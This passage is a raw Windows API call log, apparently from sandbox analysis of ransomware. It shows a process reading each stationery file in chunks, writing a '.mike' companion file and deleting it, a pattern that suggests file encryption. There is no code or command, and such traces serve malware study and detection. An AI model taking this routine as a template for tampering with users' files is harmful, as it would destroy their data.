shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.776] GetFileType (hFile=0x288) returned 0x1 [0053.776] GetFileType (hFile=0x288) returned 0x1 [0053.776] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.777] GetFileType (hFile=0x288) returned 0x1 [0053.777] GetFileType (hFile=0x288) returned 0x1 [0053.777] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.777] WriteFile (in: hFile=0x288, lpBuffer=0x220c04c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x220c04c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.778] GetFileType (hFile=0x288) returned 0x1 [0053.779] GetFileType (hFile=0x288) returned 0x1 [0053.779] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.779] ReadFile (in: hFile=0x288, lpBuffer=0x220d180, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x220d180*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0053.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.781] GetFileType (hFile=0x288) returned 0x1 [0053.781] GetFileType (hFile=0x288) returned 0x1 [0053.781] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.782] GetFileType (hFile=0x288) returned 0x1 [0053.782] GetFileType (hFile=0x288) returned 0x1 [0053.782] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0053.782] ReadFile (in: hFile=0x288, lpBuffer=0x221a15c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x221a15c*, lpNumberOfBytesRead=0x2af0c8*=0xee1, lpOverlapped=0x0) returned 1 [0053.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.782] GetFileType (hFile=0x288) returned 0x1 [0053.782] GetFileType (hFile=0x288) returned 0x1 [0053.782] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0053.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.785] GetFileType (hFile=0x288) returned 0x1 [0053.785] GetFileType (hFile=0x288) returned 0x1 [0053.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg", dwFileAttributes=0x80) returned 0 [0053.787] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.mike")) returned 1 [0053.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.790] GetFileType (hFile=0x288) returned 0x1 [0053.790] GetFileType (hFile=0x288) returned 0x1 [0053.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.791] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.791] GetFileType (hFile=0x288) returned 0x1 [0053.791] GetFileType (hFile=0x288) returned 0x1 [0053.791] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.794] GetFileType (hFile=0x288) returned 0x1 [0053.794] GetFileType (hFile=0x288) returned 0x1 [0053.794] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.794] ReadFile (in: hFile=0x288, lpBuffer=0x222c188, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x222c188*, lpNumberOfBytesRead=0x2af0c8*=0xe9, lpOverlapped=0x0) returned 1 [0053.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.795] GetFileType (hFile=0x288) returned 0x1 [0053.795] GetFileType (hFile=0x288) returned 0x1 [0053.795] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.795] GetFileType (hFile=0x288) returned 0x1 [0053.796] GetFileType (hFile=0x288) returned 0x1 [0053.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm", dwFileAttributes=0x80) returned 0 [0053.797] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.mike")) returned 1 [0053.799] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.809] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.809] GetFileType (hFile=0x288) returned 0x1 [0053.809] GetFileType (hFile=0x288) returned 0x1 [0053.809] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.810] GetFileType (hFile=0x288) returned 0x1 [0053.810] GetFileType (hFile=0x288) returned 0x1 [0053.810] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.811] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.811] GetFileType (hFile=0x288) returned 0x1 [0053.811] GetFileType (hFile=0x288) returned 0x1 [0053.811] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.811] ReadFile (in: hFile=0x288, lpBuffer=0x2238c50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2238c50*, lpNumberOfBytesRead=0x2af0c8*=0x780, lpOverlapped=0x0) returned 1 [0053.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.813] GetFileType (hFile=0x288) returned 0x1 [0053.813] GetFileType (hFile=0x288) returned 0x1 [0053.813] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.813] GetFileType (hFile=0x288) returned 0x1 [0053.813] GetFileType (hFile=0x288) returned 0x1 [0053.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg", dwFileAttributes=0x80) returned 0 [0053.815] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.mike")) returned 1 [0053.817] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.818] GetFileType (hFile=0x288) returned 0x1 [0053.818] GetFileType (hFile=0x288) returned 0x1 [0053.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.819] GetFileType (hFile=0x288) returned 0x1 [0053.819] GetFileType (hFile=0x288) returned 0x1 [0053.819] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.820] GetFileType (hFile=0x288) returned 0x1 [0053.820] GetFileType (hFile=0x288) returned 0x1 [0053.820] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.820] ReadFile (in: hFile=0x288, lpBuffer=0x224729c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x224729c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0053.822] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.822] GetFileType (hFile=0x288) returned 0x1 [0053.822] GetFileType (hFile=0x288) returned 0x1 [0053.822] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.823] GetFileType (hFile=0x288) returned 0x1 [0053.823] GetFileType (hFile=0x288) returned 0x1 [0053.823] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0053.823] ReadFile (in: hFile=0x288, lpBuffer=0x2254270, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2254270*, lpNumberOfBytesRead=0x2af0c8*=0x15a0, lpOverlapped=0x0) returned 1 [0053.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.824] GetFileType (hFile=0x288) returned 0x1 [0053.824] GetFileType (hFile=0x288) returned 0x1 [0053.824] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0053.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.824] GetFileType (hFile=0x288) returned 0x1 [0053.824] GetFileType (hFile=0x288) returned 0x1 [0053.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg", dwFileAttributes=0x80) returned 0 [0053.826] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.mike")) returned 1 [0053.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.829] GetFileType (hFile=0x288) returned 0x1 [0053.829] GetFileType (hFile=0x288) returned 0x1 [0053.829] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.829] GetFileType (hFile=0x288) returned 0x1 [0053.829] GetFileType (hFile=0x288) returned 0x1 [0053.829] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.830] GetFileType (hFile=0x288) returned 0x1 [0053.831] GetFileType (hFile=0x288) returned 0x1 [0053.831] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.831] ReadFile (in: hFile=0x288, lpBuffer=0x226734c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x226734c*, lpNumberOfBytesRead=0x2af0c8*=0xed, lpOverlapped=0x0) returned 1 [0053.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.832] GetFileType (hFile=0x288) returned 0x1 [0053.832] GetFileType (hFile=0x288) returned 0x1 [0053.832] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.832] GetFileType (hFile=0x288) returned 0x1 [0053.832] GetFileType (hFile=0x288) returned 0x1 [0053.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm", dwFileAttributes=0x80) returned 0 [0053.834] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.mike")) returned 1 [0053.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.837] GetFileType (hFile=0x288) returned 0x1 [0053.837] GetFileType (hFile=0x288) returned 0x1 [0053.837] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.838] GetFileType (hFile=0x288) returned 0x1 [0053.838] GetFileType (hFile=0x288) returned 0x1 [0053.838] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.839] GetFileType (hFile=0x288) returned 0x1 [0053.839] GetFileType (hFile=0x288) returned 0x1 [0053.839] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.839] ReadFile (in: hFile=0x288, lpBuffer=0x227417c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x227417c*, lpNumberOfBytesRead=0x2af0c8*=0x127e, lpOverlapped=0x0) returned 1 [0053.841] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.841] GetFileType (hFile=0x288) returned 0x1 [0053.841] GetFileType (hFile=0x288) returned 0x1 [0053.841] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: 